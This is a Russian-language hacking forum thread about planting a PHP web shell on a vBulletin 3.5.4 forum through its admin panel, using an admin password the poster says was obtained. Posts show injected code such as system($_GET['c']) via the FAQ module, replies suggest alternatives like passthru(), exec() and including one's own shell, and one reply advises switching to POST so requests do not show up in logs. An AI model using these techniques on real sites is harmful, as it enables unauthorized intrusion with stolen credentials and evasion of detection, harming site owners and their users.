PDA

Просмотр полной версии : vBulletin 3.5.4 -Заливка Shell'а через admincp


Tor_Zoom
17.01.2008, 05:56
Движёк:
vBulletin 3.5.4 -(добыт пасс в админ панель)
Система:
Linux,Сервер Apache v2.2.6, PHP 5.2.4, Версия MySQL 5.0.45.

Вся трабла в том,что есть(добыт) админ пасс в админ панель на форум.Пытался залить шелл через модуль "faq_complite" но не вышло.

Прописывал echo('hek'); -прокатывало-появлялось на faq.php,но если прописать system($_GET["c"]); -выдаёт ошибку(Fatal error: Call to undefined function sistem() in /home/имя папки/public_html/forum/faq.php(303) : eval()'d code on line 1).
Также пробывал includ - что-то типа include($file); -Тоже выдовало ошибку.......

Я так понимаю,что бага то не пофиксинa-дело в PHP5 или в настройках Apache....

Как это обойти?Вообще мне требуется лишь узнать,какие файлы находятся в определённой папке-название папки я знаю,но там .htaccess.

Возможно ли мне как-нибудь просмотреть папку в данном случае?

n0ne
17.01.2008, 10:18
Возможно просто system() запрещено настройками, пробуй passthru(), open_basedir(), exec() и т.п. . А вообще хороший вариант попробовать include() своего шелла, а там уже посмотришь какие функции отключены, да и удобнее.

GSM™
19.01.2008, 11:22
а через modcp можно шелла залить?
vBulletin 3.5.1

Doom123
19.01.2008, 13:25
Fatal error: Call to undefined function sistem()

Это опечатка или там так и было написано sistem()?

SanyaX
19.01.2008, 17:21
Проще всего через include. И метод ставить не GET а POST. Т.к в логах гет запросами палятся.